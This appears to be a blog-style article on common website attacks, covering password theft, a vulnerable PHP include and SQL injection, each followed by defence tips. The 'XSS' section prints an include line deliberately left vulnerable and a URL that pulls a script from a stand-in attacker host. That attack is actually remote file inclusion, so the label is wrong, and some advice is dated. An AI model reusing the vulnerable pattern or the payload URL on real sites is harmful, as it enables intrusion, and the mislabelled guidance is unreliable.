Here are the most common techniques used to hack a website

Hacking sites that are weakly protected by passwords – bypassing authentication

It’s the webmaster’s nightmare: hackers accessing the site using stolen passwords that should have been kept under control. Usually the hackers are people well known to the webmaster. They use various techniques to steal the password: they access the webmaster’s email, or they use key loggers or network sniffers to capture the passwords used in day-to-day work.

Hackers can also use techniques such as brute-force attacks (dictionary attacks) to find weak passwords. The more complex the password, the more difficult it is for hackers to identify it using this method.

How to defend

  • It’s advised to build passwords from capital letters, small letters, numbers and symbols; they should be at least 6-10 digits long.
  • Change passwords at frequent intervals
  • Don’t store the passwords in email
  • Use the latest antivirus software to make sure that the system is free of key loggers

XSS, or cross-site scripting

In this method, the hacker again gains access to your website, this time using a previously disclosed or undisclosed security vulnerability in the server software or the scripting language. Hackers try to execute code hosted on a remote computer and thereby access the secure areas of the website.

For example, in Apache/PHP, if you include a page like this

include $_GET['page'];  // vulnerable: the file to include is taken directly from the request

and use a GET request to include aboutus.php like this: http://yoursite.com/?page=aboutus, then hackers can execute a remotely hosted page like this: http://yoursite.com/?page=http://hackerssite.com/directorylist.php

This method is the simplest, and there are many variations of it, such as intercepting JavaScript to execute XSS attacks. Nowadays it is all too common, as webmasters move towards Web 2.0 techniques and use loosely coded AJAX.

Read more at http://en.wikipedia.org/wiki/Cross-site_scripting

How to defend

  • Stay aware of the XSS attacks happening around you
  • Update the web server software and server scripting language
  • Disable unwanted services in the server software
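
A defence for the include example above, added here as an illustration and not part of the original article: the `page` value is only ever used as a key into a fixed allowlist, so a URL or path supplied by the visitor is never passed to `include`. The page names, the `pages/` directory and the `resolve_page` helper are assumptions.

```php
<?php
// Added example (not from the original article): allowlist-based page include.
// The page names and the pages/ directory below are assumptions for illustration.

const PAGES = [
    'home'    => 'home.php',
    'aboutus' => 'aboutus.php',
    'contact' => 'contact.php',
];

/**
 * Map the untrusted ?page= value to a file on disk, or null if it is not allowed.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (?page[]=x) and any key not in the allowlist are rejected outright.
    // The visitor's string is used only as a lookup key, never as part of a path.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);

    // realpath() returns false for missing files; the prefix comparison confirms
    // the resolved file really sits inside the pages directory (e.g. no symlink
    // pointing elsewhere).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($target === null) {
    // ?page=http://hackerssite.com/directorylist.php ends up here: not a known key.
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

Keeping `allow_url_include` set to `Off` in php.ini (the default) additionally stops `include` from fetching remote URLs at all.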

SQL injection

In this type of attack, hackers take advantage of a compromised database. Hackers inject carefully written SQL code through the forms available on the website (registration forms, feedback forms, etc.). Read more about this type of attack here:

http://www.unixwiz.net/techtips/sql-injection.html

http://en.wikipedia.org/wiki/SQL_injection

Ways to protect

  • Clean up the inputs before inserting them into the database
  • Properly escape input strings
